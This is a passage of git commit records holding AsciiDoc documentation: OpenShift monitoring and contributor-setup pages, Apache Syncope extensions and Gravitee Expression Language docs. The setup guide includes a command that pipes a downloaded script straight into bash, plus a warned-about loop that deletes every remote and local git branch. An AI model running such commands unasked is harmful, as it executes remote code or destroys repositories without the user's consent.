link:https:\/\/github.com\/openshift\/prometheus-operator\/blob\/release-4.3\/Documentation\/api.md[Prometheus Operator API documentation] for more information on ServiceMonitors and PodMonitors.\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * monitoring\/monitoring-your-own-services.adoc\n\n[id=\"setting-up-metrics-collection_{context}\"]\n= Setting up metrics collection\n\nTo use the metrics exposed by your service, you need to configure OpenShift Monitoring to scrape metrics from the `\/metrics` endpoint. You can do this using a ServiceMonitor, a custom resource definition (CRD) that specifies how a service should be monitored, or a PodMonitor, a CRD that specifies how a pod should be monitored. The former requires a Service object, while the latter does not, allowing Prometheus to directly scrape metrics from the metrics endpoint exposed by a Pod.\n\nThis procedure shows how to create a ServiceMonitor for the service.\n\n.Prerequisites\n\n* Log in as a cluster administrator or a user with the `monitor-crd-edit` role.\n\n.Procedure\n\n. Create a YAML file for the ServiceMonitor configuration. In this example, the file is called `example-app-service-monitor.yaml`.\n\n. Fill the file with the configuration for creating the ServiceMonitor:\n+\n[source,yaml]\n----\napiVersion: monitoring.coreos.com\/v1\nkind: ServiceMonitor\nmetadata:\n labels:\n k8s-app: prometheus-example-monitor\n name: prometheus-example-monitor\n namespace: ns1\nspec:\n endpoints:\n - interval: 30s\n port: web\n scheme: http\n selector:\n matchLabels:\n app: prometheus-example-app\n----\n+\nThis configuration makes OpenShift Monitoring scrape the metrics exposed by the sample service deployed in \"Deploying a sample service\", which includes the single `version` metric.\n\n. Apply the configuration file to the cluster:\n+\n----\n$ oc apply -f example-app-service-monitor.yaml\n----\n+\nIt will take some time to deploy the ServiceMonitor.\n\n. You can check that the ServiceMonitor is running:\n+\n----\n$ oc -n ns1 get servicemonitor\nNAME AGE\nprometheus-example-monitor 81m\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f9bd011e85cf4d5a6614b30ca3435e65960e9783","subject":"Fix an OL formatting error in contributor guide","message":"Fix an OL formatting error in contributor guide\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"contributing_to_docs\/tools_and_setup.adoc","new_file":"contributing_to_docs\/tools_and_setup.adoc","new_contents":"[id=\"contributing-to-docs-tools-and-setup\"]\n= Install and set up the tools and software\n:icons:\n:toc: macro\n:toc-title:\n:toclevels: 1\n:linkattrs:\n:description: How to set up and install the tools to contribute\n\ntoc::[]\n\n== Create a GitHub account\nBefore you can contribute to OpenShift documentation, you must\nhttps:\/\/www.github.com\/join[sign up for a GitHub account].\n\n== Set up authentication\nWhen you have your account set up, follow the instructions to\nhttps:\/\/help.github.com\/articles\/generating-ssh-keys\/[generate and set up SSH\nkeys on GitHub] for proper authentication between your workstation and GitHub.\n\nConfirm authentication is working correctly with the following command:\n\n----\n$ ssh -T git@github.com\n----\n\n== Fork and clone the OpenShift documentation repository\nYou must fork and set up the OpenShift documentation repository on your\nworkstation so that you can create PRs and contribute. These steps must only\nbe performed during initial setup.\n\n. Fork the https:\/\/github.com\/openshift\/openshift-docs repository into your\nGitHub account from the GitHub UI. You can do this by clicking on *Fork* in the\nupper right-hand corner.\n\n. In the terminal on your workstation, change into the directory where you want\nto clone the forked repository.\n\n. Clone the forked repository onto your workstation with the following\ncommand, replacing _<user_name>_ with your actual GitHub username.\n+\n----\n$ git clone git@github.com:<user_name>\/openshift-docs.git\n----\n\n. Change into the directory for the local repository you just cloned.\n+\n----\n$ cd openshift-docs\n----\n\n. Add an upstream pointer back to the OpenShift's remote repository, in this\ncase _openshift-docs_.\n+\n----\n$ git remote add upstream git@github.com:openshift\/openshift-docs.git\n----\n\nThis ensures that you are tracking the remote repository to keep your local\nrepository in sync with it.\n\n== Install AsciiBinder and dependencies\nWhen you have the documentation repository cloned and set up, you are ready to\ninstall the software and tools you will use to create the content. All OpenShift\ndocumentation is created in AsciiDoc, and is processed with https:\/\/github.com\/redhataccess\/ascii_binder[AsciiBinder],\nwhich is an http:\/\/asciidoctor.org\/[AsciiDoctor]-based docs management system.\n\n\n=== What you require\nThe following are minimum requirements:\n\n* A bash shell environment (Linux and OS X include a bash shell environment out\nof the box, but if you are on Windows you can use http:\/\/cygwin.com\/[Cygwin])\n* https:\/\/www.ruby-lang.org\/en\/[Ruby]\n* http:\/\/www.git-scm.com\/[Git]\n* A web browser (Firefox, Chrome, or Safari)\n* An editor that can strip trailing whitespace, such as\nlink:https:\/\/atom.io\/[Atom].\n\n=== Install the required software dependencies on a Linux system\nThe following instructions describe how to install all the required tools to do\nlive content editing on a Fedora Linux system.\n\n1. Install the _RubyGems_ package with `yum install rubygems`\n+\n[NOTE]\n====\nOn certain systems, `yum` installs an older version of RubyGems that can cause issues. As an alternative, you can install RubyGems by using RVM. The following example is referenced from the link:https:\/\/rvm.io\/rvm\/install[RVM site]:\n\n[source,terminal]\n----\n$ curl -sSL https:\/\/get.rvm.io | bash -s stable --ruby\n----\n====\n\n2. Install _Ruby_ development packages with `yum install ruby-devel`\n3. Install _gcc_ with `yum install gcc-c++`\n4. Install _redhat-rpm-config_ with `yum install redhat-rpm-config`\n5. Install _make_ with `yum install make`\n6. Install _asciidoctor-diagram_ with `gem install asciidoctor-diagram`\n7. Install the _ascii_binder_ gem with `gem install ascii_binder`\n\nNOTE: If you already have AsciiBinder installed, you might be due for an update.\nThese directions assume that you are using AsciiBinder 0.2.0 or newer. To check\nand update if necessary, simply run `gem update ascii_binder`. Note that you might require root permissions.\n\n=== Building the collection\nWith the initial setup complete, you are ready to build the collection.\n\n1. From the `openshift-docs` directory, run an initial build:\n+\n----\n$ cd openshift-docs\n$ asciibinder build\n----\n2. Open the generated HTML file in your web browser. This will be located in the\n`openshift-docs\/_preview\/<distro>\/<branch>` directory, with the same path and\nfilename as the original `.adoc` file you edited, only it will be with the\n`.html` extension.\n\n== Clean up\nThe `.gitignore` file is set up to prevent anything under the `_preview` and\n`_package` directories from being committed. However, you can reset the\nenvironment manually by running:\n\n----\n$ asciibinder clean\n----\n\n== Next steps\nWith the repository and tools set up on your workstation, you can now either\nedit existing content or create assemblies and modules.\n\n* link:doc_guidelines.adoc[Review the documentation guidelines] to understand\nsome basic guidelines to keep things consistent across our content.\n* link:create_or_edit_content.adoc[Create a local working branch] on your\nworkstation to edit existing content or create content.\n\n=== How to deploy to your own OpenShift cluster for testing\n\nYou can deploy to your own OpenShift cluster for development. This process will use your github repo to launch the website,\nand therefore your github repo must have all of the upstream branches. `main` is used for site changes,\nso assuming all your work is in `main`, you can remove all remote branches and then push the upstream branches.\n\n\nRemoving remote branches and updating with upstream branches (this assumes remote repos called `origin` and `upstream`)\n[WARNING]\n====\nThis is a destructive process, make sure that this is purely a development repo, as all local and remote branches will be deleted\nby performing the below commands.\n====\n----\n$ git fetch --all\n$ for branch in $(git branch -r | grep -v \"main\" | grep \"^ origin\"); do git push origin --delete $(echo $branch | cut -d '\/' -f 2); done\n$ git branch -D $(git branch | grep -v 'main' | xargs)\n$ for branch in $(git branch -r | grep -v \"main\" | grep \"^ upstream\"); do git branch --track $(echo $branch | cut -d '\/' -f 2) $(echo $branch | tr -d '[:space:]'); done\n$ for branch in $(git branch | grep -v \"main\"); do git push origin $(echo $branch | tr -d '[:space:]'); done\n----\n\nDeploying the docs site to an OpenShift cluster\n----\n$ oc process -f asciibinder-template.yml -p NAME=community-docs \\\n -p SOURCE_REPOSITORY_URL=$(git remote get-url origin) \\\n -p SOURCE_REPOSITORY_REF=$(git rev-parse --abbrev-ref HEAD) \\\n -p DOC_TYPE=community \\\n | oc create -f -\n$ oc process -f asciibinder-template.yml -p NAME=commercial-docs \\\n -p SOURCE_REPOSITORY_URL=$(git remote get-url origin) \\\n -p SOURCE_REPOSITORY_REF=$(git rev-parse --abbrev-ref HEAD) \\\n -p DOC_TYPE=commercial \\\n | oc create -f -\n----\n\n[NOTE]\n====\nIf the build fails with \"Fetch source failed\" status, you can\ndelete all the created objects and re-run above with an HTTP uri\nas the `SOURCE_REPOSITORY_URL`, or you can\nlink:https:\/\/docs.okd.io\/latest\/dev_guide\/builds\/build_inputs.html#source-secrets-combinations[create a source secret]\nand add it to the stg1 build, `oc set build-secret --source bc\/stg1-docs <secret name>`.\n====\n\n\nYou can delete all created objects by running\n\n----\n$ oc delete all -l app=community-docs\n$ oc delete all -l app=commercial-docs\n----\n","old_contents":"[id=\"contributing-to-docs-tools-and-setup\"]\n= Install and set up the tools and software\n:icons:\n:toc: macro\n:toc-title:\n:toclevels: 1\n:linkattrs:\n:description: How to set up and install the tools to contribute\n\ntoc::[]\n\n== Create a GitHub account\nBefore you can contribute to OpenShift documentation, you must\nhttps:\/\/www.github.com\/join[sign up for a GitHub account].\n\n== Set up authentication\nWhen you have your account set up, follow the instructions to\nhttps:\/\/help.github.com\/articles\/generating-ssh-keys\/[generate and set up SSH\nkeys on GitHub] for proper authentication between your workstation and GitHub.\n\nConfirm authentication is working correctly with the following command:\n\n----\n$ ssh -T git@github.com\n----\n\n== Fork and clone the OpenShift documentation repository\nYou must fork and set up the OpenShift documentation repository on your\nworkstation so that you can create PRs and contribute. These steps must only\nbe performed during initial setup.\n\n. Fork the https:\/\/github.com\/openshift\/openshift-docs repository into your\nGitHub account from the GitHub UI. You can do this by clicking on *Fork* in the\nupper right-hand corner.\n\n. In the terminal on your workstation, change into the directory where you want\nto clone the forked repository.\n\n. Clone the forked repository onto your workstation with the following\ncommand, replacing _<user_name>_ with your actual GitHub username.\n+\n----\n$ git clone git@github.com:<user_name>\/openshift-docs.git\n----\n\n. Change into the directory for the local repository you just cloned.\n+\n----\n$ cd openshift-docs\n----\n\n. Add an upstream pointer back to the OpenShift's remote repository, in this\ncase _openshift-docs_.\n+\n----\n$ git remote add upstream git@github.com:openshift\/openshift-docs.git\n----\n\nThis ensures that you are tracking the remote repository to keep your local\nrepository in sync with it.\n\n== Install AsciiBinder and dependencies\nWhen you have the documentation repository cloned and set up, you are ready to\ninstall the software and tools you will use to create the content. All OpenShift\ndocumentation is created in AsciiDoc, and is processed with https:\/\/github.com\/redhataccess\/ascii_binder[AsciiBinder],\nwhich is an http:\/\/asciidoctor.org\/[AsciiDoctor]-based docs management system.\n\n\n=== What you require\nThe following are minimum requirements:\n\n* A bash shell environment (Linux and OS X include a bash shell environment out\nof the box, but if you are on Windows you can use http:\/\/cygwin.com\/[Cygwin])\n* https:\/\/www.ruby-lang.org\/en\/[Ruby]\n* http:\/\/www.git-scm.com\/[Git]\n* A web browser (Firefox, Chrome, or Safari)\n* An editor that can strip trailing whitespace, such as\nlink:https:\/\/atom.io\/[Atom].\n\n=== Install the required software dependencies on a Linux system\nThe following instructions describe how to install all the required tools to do\nlive content editing on a Fedora Linux system.\n\n1. Install the _RubyGems_ package with `yum install rubygems`\n\n[NOTE]\n====\nOn certain systems, `yum` installs an older version of RubyGems that can cause issues. As an alternative, you can install RubyGems by using RVM. The following example is referenced from the link:https:\/\/rvm.io\/rvm\/install[RVM site]:\n\n[source,terminal]\n----\n$ curl -sSL https:\/\/get.rvm.io | bash -s stable --ruby\n----\n====\n\n2. Install _Ruby_ development packages with `yum install ruby-devel`\n3. Install _gcc_ with `yum install gcc-c++`\n4. Install _redhat-rpm-config_ with `yum install redhat-rpm-config`\n5. Install _make_ with `yum install make`\n6. Install _asciidoctor-diagram_ with `gem install asciidoctor-diagram`\n7. Install the _ascii_binder_ gem with `gem install ascii_binder`\n\nNOTE: If you already have AsciiBinder installed, you might be due for an update.\nThese directions assume that you are using AsciiBinder 0.2.0 or newer. To check\nand update if necessary, simply run `gem update ascii_binder`. Note that you might require root permissions.\n\n=== Building the collection\nWith the initial setup complete, you are ready to build the collection.\n\n1. From the `openshift-docs` directory, run an initial build:\n+\n----\n$ cd openshift-docs\n$ asciibinder build\n----\n2. Open the generated HTML file in your web browser. This will be located in the\n`openshift-docs\/_preview\/<distro>\/<branch>` directory, with the same path and\nfilename as the original `.adoc` file you edited, only it will be with the\n`.html` extension.\n\n== Clean up\nThe `.gitignore` file is set up to prevent anything under the `_preview` and\n`_package` directories from being committed. However, you can reset the\nenvironment manually by running:\n\n----\n$ asciibinder clean\n----\n\n== Next steps\nWith the repository and tools set up on your workstation, you can now either\nedit existing content or create assemblies and modules.\n\n* link:doc_guidelines.adoc[Review the documentation guidelines] to understand\nsome basic guidelines to keep things consistent across our content.\n* link:create_or_edit_content.adoc[Create a local working branch] on your\nworkstation to edit existing content or create content.\n\n=== How to deploy to your own OpenShift cluster for testing\n\nYou can deploy to your own OpenShift cluster for development. This process will use your github repo to launch the website,\nand therefore your github repo must have all of the upstream branches. `main` is used for site changes,\nso assuming all your work is in `main`, you can remove all remote branches and then push the upstream branches.\n\n\nRemoving remote branches and updating with upstream branches (this assumes remote repos called `origin` and `upstream`)\n[WARNING]\n====\nThis is a destructive process, make sure that this is purely a development repo, as all local and remote branches will be deleted\nby performing the below commands.\n====\n----\n$ git fetch --all\n$ for branch in $(git branch -r | grep -v \"main\" | grep \"^ origin\"); do git push origin --delete $(echo $branch | cut -d '\/' -f 2); done\n$ git branch -D $(git branch | grep -v 'main' | xargs)\n$ for branch in $(git branch -r | grep -v \"main\" | grep \"^ upstream\"); do git branch --track $(echo $branch | cut -d '\/' -f 2) $(echo $branch | tr -d '[:space:]'); done\n$ for branch in $(git branch | grep -v \"main\"); do git push origin $(echo $branch | tr -d '[:space:]'); done\n----\n\nDeploying the docs site to an OpenShift cluster\n----\n$ oc process -f asciibinder-template.yml -p NAME=community-docs \\\n -p SOURCE_REPOSITORY_URL=$(git remote get-url origin) \\\n -p SOURCE_REPOSITORY_REF=$(git rev-parse --abbrev-ref HEAD) \\\n -p DOC_TYPE=community \\\n | oc create -f -\n$ oc process -f asciibinder-template.yml -p NAME=commercial-docs \\\n -p SOURCE_REPOSITORY_URL=$(git remote get-url origin) \\\n -p SOURCE_REPOSITORY_REF=$(git rev-parse --abbrev-ref HEAD) \\\n -p DOC_TYPE=commercial \\\n | oc create -f -\n----\n\n[NOTE]\n====\nIf the build fails with \"Fetch source failed\" status, you can\ndelete all the created objects and re-run above with an HTTP uri\nas the `SOURCE_REPOSITORY_URL`, or you can\nlink:https:\/\/docs.okd.io\/latest\/dev_guide\/builds\/build_inputs.html#source-secrets-combinations[create a source secret]\nand add it to the stg1 build, `oc set build-secret --source bc\/stg1-docs <secret name>`.\n====\n\n\nYou can delete all created objects by running\n\n----\n$ oc delete all -l app=community-docs\n$ oc delete all -l app=commercial-docs\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c2c06a985efae35bba59f16a77d97696eb7eb39d","subject":"[SYNCOPE-152] Little doc addition","message":"[SYNCOPE-152] Little doc addition\n","repos":"apache\/syncope,ilgrosso\/syncope,ilgrosso\/syncope,apache\/syncope,apache\/syncope,ilgrosso\/syncope,ilgrosso\/syncope,apache\/syncope","old_file":"src\/main\/asciidoc\/reference-guide\/concepts\/extensions.adoc","new_file":"src\/main\/asciidoc\/reference-guide\/concepts\/extensions.adoc","new_contents":"\/\/\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\/\/\n=== Extensions\n\nThe _vanilla_ Apache Syncope deployment can be optional enriched with useful features via an Extension, instead of bloating\nevery single deployment with unneeded libraries and configurations.\n\nWith reference to <<architecture,architecture>>, an extension might add a <<rest>> endpoint, manage the\n<<persistence,persistence>> of additional entities, extend the <<security,security>> mechanisms, tweak the\n<<provisioning-layer,provisioning layer>>, add features to the <<admin-console-component>> or\nthe <<enduser-component>>, or even bring all such things together.\n\nExtensions are available from different sources:\n\n. as Maven artifacts published from the Apache Syncope codebase, part of the official releases - this is the case of the\nones detailed below;\n. as Maven artifacts published by third parties;\n. as part of a given deployment source code, as explained <<customization-extensions, in the following>>.\n\n==== Apache Camel Provisioning Manager\n\nThis extension delegates the <<provisioning,provisioning>> process execution to a set of\nhttp:\/\/camel.apache.org[Apache Camel^] routes.\n\nThe pre-loaded routes can be dynamically changed at runtime via REST or admin console, and modifications are immediately\nmade available for processing.\n\nFor example, on creating a new user, you may wish to send an email to an administrator; or if a user is\nreactivated, you may wish to reactivate the user's home page on a web server. +\nAll these things and more are possible using the myriad of\nhttp:\/\/camel.apache.org\/components.html[components^] that are available to be used in Apache Camel routes.\n\n[NOTE]\n.Extension Sources\n====\nThe source code of this extension is available from the Apache Syncope\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/syncope-{docVersion}\/ext\/camel[source tree^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/master\/ext\/camel[source tree^]\nendif::[]\n.\n====\n\n==== Swagger\n\nThis extension enables http:\/\/swagger.io\/swagger-ui\/[Swagger UI^] as web interface for dealing with Apache Syncope\n<<rest,RESTful>> services.\n\nOnce installed, Swagger UI is available at\n\n....\nprotocol:\/\/host:port\/syncope\/swagger\/\n....\n\nwhere `protocol`, `host` and `port` reflect your Java EE container installation.\n\n[NOTE]\n.Extension Sources\n====\nThe source code of this extension is available from the Apache Syncope\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/syncope-{docVersion}\/ext\/swagger-ui[source tree^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/master\/ext\/swagger-ui[source tree^]\nendif::[]\n.\n====\n\n==== SAML 2.0 Service Provider\n\nThis extension can be leveraged to provide\nhttps:\/\/en.wikipedia.org\/wiki\/Security_Assertion_Markup_Language[SAML 2.0^]-based\nhttps:\/\/en.wikipedia.org\/wiki\/Single_sign-on[Single Sign-On^] access to the <<admin-console-component>>,\nthe <<enduser-component>> or any other Java EE application dealing with the <<core>>.\n\nOnce installed, one or more https:\/\/en.wikipedia.org\/wiki\/Identity_provider[Identity Providers^] can be imported from\ntheir https:\/\/en.wikipedia.org\/wiki\/SAML_2.0#SAML_2.0_Metadata[metadata^].\nFor each Identity Provider, it is to configure which one of the attributes - returned as part of the assertion\ncontaining the attribute statements - is going to be used by Syncope to match the internal users.\n\n[NOTE]\n.Extension Sources\n====\nThe source code of this extension is available from the Apache Syncope\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/syncope-{docVersion}\/ext\/saml2sp[source tree^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/master\/ext\/saml2sp[source tree^]\nendif::[]\n.\n====\n\n[TIP]\n====\nThis extension adds features to all components and layers that are available, and can be taken as reference when creating\n<<customization-extensions,new extensions>>.\n====\n\n==== Elasticsearch\n\nThis extension provides an alternate internal search engine for <<users-groups-and-any-objects>>, requiring an external \nhttps:\/\/www.elastic.co\/[Elasticsearch^] cluster.\n\n[TIP]\nAs search operations are central for different aspects of the <<provisioning,provisioning process>>, the global\nperformances are expected to improve when using this extension.\n\n[NOTE]\n.Extension Sources\n====\nThe source code of this extension is available from the Apache Syncope\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/syncope-{docVersion}\/ext\/elasticsearch[source tree^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/master\/ext\/elasticsearch[source tree^]\nendif::[]\n.\n====\n\n==== SCIM\n\nhttp:\/\/www.simplecloud.info\/[SCIM^] (System for Cross-domain Identity Management) 2.0 is the open API for managing\nidentities, published under the IETF:\n\n. https:\/\/tools.ietf.org\/html\/rfc7642[Definitions, Overview, Concepts, and Requirements^]\n. https:\/\/tools.ietf.org\/html\/rfc7643[Core Schema^]\n. https:\/\/tools.ietf.org\/html\/rfc7644[Protocol^]\n\nThis extension enables an additional `\/scim` REST endpoint, implementing the communication according to the SCIM 2.0\nstandard, in order to provision User, Enterprise User and Group SCIM entities to Apache Syncope.\n\n[NOTE]\n.Extension Sources\n====\nThe source code of this extension is available from the Apache Syncope\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/syncope-{docVersion}\/ext\/scimv2[source tree^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/master\/ext\/scimv2[source tree^]\nendif::[]\n.\n====\n","old_contents":"\/\/\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\/\/\n=== Extensions\n\nThe _vanilla_ Apache Syncope deployment can be optional enriched with useful features via an Extension, instead of bloating\nevery single deployment with unneeded libraries and configurations.\n\nWith reference to <<architecture,architecture>>, an extension might add a <<rest>> endpoint, manage the\n<<persistence,persistence>> of additional entities, extend the <<security,security>> mechanisms, tweak the\n<<provisioning-layer,provisioning layer>>, add features to the <<admin-console-component>> or\nthe <<enduser-component>>, or even bring all such things together.\n\nExtensions are available from different sources:\n\n. as Maven artifacts published from the Apache Syncope codebase, part of the official releases - this is the case of the\nones detailed below;\n. as Maven artifacts published by third parties;\n. as part of a given deployment source code, as explained <<customization-extensions, in the following>>.\n\n==== Apache Camel Provisioning Manager\n\nThis extension delegates the <<provisioning,provisioning>> process execution to a set of\nhttp:\/\/camel.apache.org[Apache Camel^] routes.\n\nThe pre-loaded routes can be dynamically changed at runtime via REST or admin console, and modifications are immediately\nmade available for processing.\n\nFor example, on creating a new user, you may wish to send an email to an administrator; or if a user is\nreactivated, you may wish to reactivate the user's home page on a web server. +\nAll these things and more are possible using the myriad of\nhttp:\/\/camel.apache.org\/components.html[components^] that are available to be used in Apache Camel routes.\n\n[NOTE]\n.Extension Sources\n====\nThe source code of this extension is available from the Apache Syncope\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/syncope-{docVersion}\/ext\/camel[source tree^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/master\/ext\/camel[source tree^]\nendif::[]\n.\n====\n\n==== Swagger\n\nThis extension enables http:\/\/swagger.io\/swagger-ui\/[Swagger UI^] as web interface for dealing with Apache Syncope\n<<rest,RESTful>> services.\n\nOnce installed, Swagger UI is available at\n\n....\nprotocol:\/\/host:port\/syncope\/swagger\/\n....\n\nwhere `protocol`, `host` and `port` reflect your Java EE container installation.\n\n[NOTE]\n.Extension Sources\n====\nThe source code of this extension is available from the Apache Syncope\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/syncope-{docVersion}\/ext\/swagger-ui[source tree^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/master\/ext\/swagger-ui[source tree^]\nendif::[]\n.\n====\n\n==== SAML 2.0 Service Provider\n\nThis extension can be leveraged to provide\nhttps:\/\/en.wikipedia.org\/wiki\/Security_Assertion_Markup_Language[SAML 2.0^]-based\nhttps:\/\/en.wikipedia.org\/wiki\/Single_sign-on[Single Sign-On^] access to the <<admin-console-component>>,\nthe <<enduser-component>> or any other Java EE application dealing with the <<core>>.\n\nOnce installed, one or more https:\/\/en.wikipedia.org\/wiki\/Identity_provider[Identity Providers^] can be imported from\ntheir https:\/\/en.wikipedia.org\/wiki\/SAML_2.0#SAML_2.0_Metadata[metadata^].\nFor each Identity Provider, it is to configure which one of the attributes - returned as part of the assertion\ncontaining the attribute statements - is going to be used by Syncope to match the internal users.\n\n[NOTE]\n.Extension Sources\n====\nThe source code of this extension is available from the Apache Syncope\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/syncope-{docVersion}\/ext\/saml2sp[source tree^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/master\/ext\/saml2sp[source tree^]\nendif::[]\n.\n====\n\n[TIP]\n====\nThis extension adds features to all components and layers that are available, and can be taken as reference when creating\n<<customization-extensions,new extensions>>.\n====\n\n==== Elasticsearch\n\nThis extension provides an alternate internal search engine for <<users-groups-and-any-objects>>, requiring an external \nhttps:\/\/www.elastic.co\/[Elasticsearch^] cluster.\n\n[TIP]\nAs search operations are central for different aspects of the <<provisioning,provisioning process>>, the global\nperformances are expected to improve when using this extension.\n\n[NOTE]\n.Extension Sources\n====\nThe source code of this extension is available from the Apache Syncope\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/syncope-{docVersion}\/ext\/elasticsearch[source tree^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/master\/ext\/elasticsearch[source tree^]\nendif::[]\n.\n====\n\n==== SCIM\n\nhttp:\/\/www.simplecloud.info\/[SCIM^] (System for Cross-domain Identity Management) 2.0 is the open API for managing\nidentities, published under the IETF:\n\n. https:\/\/tools.ietf.org\/html\/rfc7642[Definitions, Overview, Concepts, and Requirements^]\n. https:\/\/tools.ietf.org\/html\/rfc7643[Core Schema^]\n. https:\/\/tools.ietf.org\/html\/rfc7644[Protocol^]\n\nThis extension enables an additional `\/scim` REST endpoint, implementing the communication according to the SCIM 2.0\nstandard.\n\n[NOTE]\n.Extension Sources\n====\nThe source code of this extension is available from the Apache Syncope\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/syncope-{docVersion}\/ext\/scimv2[source tree^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/tree\/master\/ext\/scimv2[source tree^]\nendif::[]\n.\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8525fc3173c23b41c3fcd82816965ac13114c33d","subject":"feat: allow access to SSL attributes in EL TemplateEngine","message":"feat: allow access to SSL attributes in EL TemplateEngine\n\ngravitee-io\/#issues#5322\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/apim\/3.x\/user-guide\/publisher\/expression-language.adoc","new_file":"pages\/apim\/3.x\/user-guide\/publisher\/expression-language.adoc","new_contents":"= Expression Language\n:page-sidebar: apim_3_x_sidebar\n:page-permalink: apim\/3.x\/apim_publisherguide_expression_language.html\n:page-folder: apim\/user-guide\/publisher\n:page-layout: apim3x\n\n== Overview\n\nThe APIM Expression Language (EL for short) is one of the key features\nthat can be used by API publishers to configure various aspects and services of an API.\n\nThe EL is a powerful language used for querying and\nmanipulating an object graph. It is based on the http:\/\/docs.spring.io\/spring\/docs\/current\/spring-framework-reference\/html\/expressions.html[SpEL^] (Spring Expression Language).\nThis means that you can do everything described in the link.\n\nIn addition, APIM extends the standard SpEL capabilities by providing extra objects and properties\ninside the expression language context.\n\n== Usage\nThe basic expression language syntax is as follows:\n\n`{#request.id}`\n\nSee the sections below for example expression notations.\n\n== API\n=== Properties\n\nAs an API publisher, you can define properties for your API. These properties are\nautomatically _injected_ into the expression language context to be used later.\n\n==== Example\n\n* Get the value of the property `my-property` defined in API properties:\n`{#properties['my-property']}`\n\n=== Dictionaries\n\nDictionaries work in a similar way to properties, but you need to specify the dictionary name as well as the property name.\n\n==== Example\n\n* Get the value of the property `my-property` defined in dictionary `my-dictionary`:\n`{#dictionaries['my-dictionary']['my-property']}`\n\n=== Endpoints\nWhen you define endpoints for your API, you need to give them a _name_ which\nmust be a unique identifier across all endpoints of the API. This identifier can be used to get an endpoint reference (i.e. uri).\n\nFor example: when you create an API, a _default_ endpoint is created,\ncorresponding to the value you set for the backend property. This endpoint can\nbe retrieved with EL by using the following syntax:\n\n`{#endpoints['default']}`\n\n== Request\n\nThe properties you can access for API requests are listed below.\n\n|===\n.^|Property |Description ^.^|Type |Example\n\n.^|id |Identifier ^.^|string |12345678-90ab-cdef-1234-567890ab\n.^|transactionId |Transaction identifier ^.^|string |cd123456-7890-abcd-ef12-34567890\n.^|uri |URI ^.^|string |\/v2\/store\/MyStore?order=100\n.^|path |Path ^.^|string |\/v2\/store\/MyStore\n.^|paths |Path parts ^.^|array of string 